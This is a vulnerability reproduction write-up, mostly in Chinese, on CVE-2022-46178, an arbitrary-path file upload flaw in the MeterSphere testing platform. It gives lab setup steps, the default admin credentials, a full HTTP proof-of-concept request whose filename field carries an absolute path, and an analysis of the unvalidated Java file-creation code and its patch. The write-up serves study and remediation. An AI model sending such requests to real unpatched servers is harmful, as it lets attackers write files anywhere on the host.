漏洞信息
NVD - cve-2022-46178
MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.1 allow users to upload a file, but do not validate the file name, which may lead to upload file to any path. The vulnerability has been fixed in v2.5.1. There are no workarounds.
背景介绍
MeterSphere is an open-source, continuous testing platform widely used by developers and QA managers for test plan management, data-driven testing, and test reporting metrics. It is engineered to integrate seamlessly with a variety of development and CI/CD toolchains to enhance productivity in DevOps environments. The platform supports functional UI, performance, and API testing, aiming to optimize testing workflows. The primary users of MeterSphere are software development teams and testing specialists seeking to attain high-quality assurance in their product cycles. Its robust plug-in architecture allows it to be extended and customized for specific workflows and tool integrations, making it adaptable across different industry requirements.
主页:https://metersphere.io/
源码:https://github.com/metersphere/metersphere
环境搭建
$ wget https://github.com/metersphere/metersphere/releases/download/v2.10.1-lts/metersphere-online-installer-v2.10.1-lts.tar.gz --no-check-certificate
$ tar zxvf metersphere-online-installer-v2.10.1-lts.tar.gz
$ cd metersphere-online-installer-v2.10.1-lts
$ sudo ./install.sh
$ msctl statusName Command State Ports
--------------------------------------------------------------------------------------
api-test /deployments/run-java.sh Up (healthy) 0.0.0.0:10000->10000/tcp,:::10000->10000/tcp, 0.0.0.0:10001->10001/tcp,:::10001->10001/tcp, 0.0.0.0:10002->10002/tcp,:::10002->10002/tcp, 0.0.0.0:10003->10003/tcp,:::10003->10003/tcp, 0.0.0.0:10004->10004/tcp,:::10004->10004/tcp, 0.0.0.0:10005->10005/tcp,:::10005->10005/tcp, 0.0.0.0:10006->10006/tcp,:::10006->10006/tcp, 0.0.0.0:10007->10007/tcp,:::10007->10007/tcp, 0.0.0.0:10008->10008/tcp,:::10008->10008/tcp, 0.0.0.0:10009->10009/tcp,:::10009->10009/tcp, 0.0.0.0:10010->10010/tcp,:::10010->10010/tcp
eureka /deployments/run-java.sh Up (healthy)
gateway /deployments/run-java.sh Up (healthy) 0.0.0.0:8081->8000/tcp,:::8081->8000/tcp
kafka /opt/bitnami/scripts/kaf Up (healthy) 0.0.0.0:9092->9092/tcp,ka ... :::9092->9092/tcp
minio /usr/bin/docker- Up (healthy) 0.0.0.0:9000->9000/tcp,entrypoint ... :::9000->9000/tcp, 0.0.0.0:9001->9001/tcp,:::9001->9001/tcp
ms-data-streaming /deployments/run-java.sh Up (healthy)
ms-node-controller sh -c sed -i Up (healthy) 0.0.0.0:8082->8082/tcp,"s/:101:/:136 ... :::8082->8082/tcp, 0.0.0.0:9100->9100/tcp,:::9100->9100/tcp
ms-prometheus /bin/prometheus Up (healthy) 0.0.0.0:9091->9090/tcp,--config.f ... :::9091->9090/tcp
mysql docker-entrypoint.sh Up (healthy) 0.0.0.0:3306->3306/tcp,mysqld :::3306->3306/tcp, 33060/tcp
nodeexporter /bin/node_exporter Up (healthy) --path. ...
performance-test /deployments/run-java.sh Up (healthy)
project-management /deployments/run-java.sh Up (healthy)
redis docker-entrypoint.sh Up (healthy) 0.0.0.0:6379->6379/tcp,redis ... :::6379->6379/tcp
report-stat /deployments/run-java.sh Up (healthy)
system-setting /deployments/run-java.sh Up (healthy)
test-track /deployments/run-java.sh Up (healthy)
workstation /deployments/run-java.sh Up (healthy)
Debug1:访问Web UI有{"success":false,"message":"401 UNAUTHORIZED \"Not found session, Please Login again.\"","data":null}报错,一定要等待所有容器Up并healthy状态,后再等5min访问Web UI(不要中途切换)。
Debug2:9090端口号占用问题,在docker-compose-prometheus.yml和install.conf修改为9091即可。
# Debug3: Additionally
$ msctl restart gateway
$ msctl restart workstation
$ msctl restart prometheus
Web UI:http://127.0.0.1:8081
账号admin、密码metersphere
漏洞复现
参考:https://github.com/metersphere/metersphere/security/advisories/GHSA-9p62-x3c5-hr5p
这个漏洞的触发点很多,根本原因是其底层的文件创建函数没有写好,后面漏洞分析也会提到。
例如在性能测试页面创建新的测试实例,步骤如下:
在这里可以进行上传请求:
抓包改包,成功上传,没有检查:
POC:
POST /performance/project/upload/files/7a6e9276-bdb8-11ef-bcf6-0242ac1e0a07 HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate, br
CSRF-TOKEN: oklQnocyYFopwrJGK/cGxxWzJNdKvbw6jV5B1yeIcfFT57zVhHZkd494+5gX977DVo2myPZcL2stppCOwnW66w==
X-AUTH-TOKEN: c34a7ff5-53b1-44ff-bd53-c03fe5c7b148
WORKSPACE: 7a6e6750-bdb8-11ef-bcf6-0242ac1e0a07
PROJECT: 7a6e9276-bdb8-11ef-bcf6-0242ac1e0a07
Content-Type: multipart/form-data; boundary=---------------------------260742380731415149212240575586
Content-Length: 276
Origin: http://127.0.0.1:8081
Connection: keep-alive
Referer: http://127.0.0.1:8081/
-----------------------------260742380731415149212240575586
Content-Disposition: form-data; name="file"; filename="/tmp/test_hacked.php"
Content-Type: text/html
<script>alert("You are hacked\!")</script>
-----------------------------260742380731415149212240575586--
漏洞分析
漏洞点位于framework/sdk-parent/sdk/src/main/java/io/metersphere/commons/utils/FileUtils.java#L57:
public static void createFile(String filePath, byte[] fileBytes) {File file = new File(filePath);if (file.exists()) {file.delete();}try {File dir = file.getParentFile();if (!dir.exists()) {dir.mkdirs();}file.createNewFile();} catch (Exception e) {LogUtil.error(e);}try (InputStream in = new ByteArrayInputStream(fileBytes); OutputStream out = new FileOutputStream(file)) {final int MAX = 4096;byte[] buf = new byte[MAX];for (int bytesRead = in.read(buf, 0, MAX); bytesRead != -1; bytesRead = in.read(buf, 0, MAX)) {out.write(buf, 0, bytesRead);}} catch (IOException e) {LogUtil.error(e);MSException.throwException(Translator.get("upload_fail"));}}
其他多个服务会调用这个接口,导致漏洞触发:
修复方案
补丁包增加了对上传文件名的校验:https://github.com/metersphere/metersphere/commit/3a890eeeb8a6b0887927c876a73bdb3a99a82138#diff-a099ade6eda784ae74aded98b0e9430b2cc21bc58aa7269922a234c3ea68192fR36
)
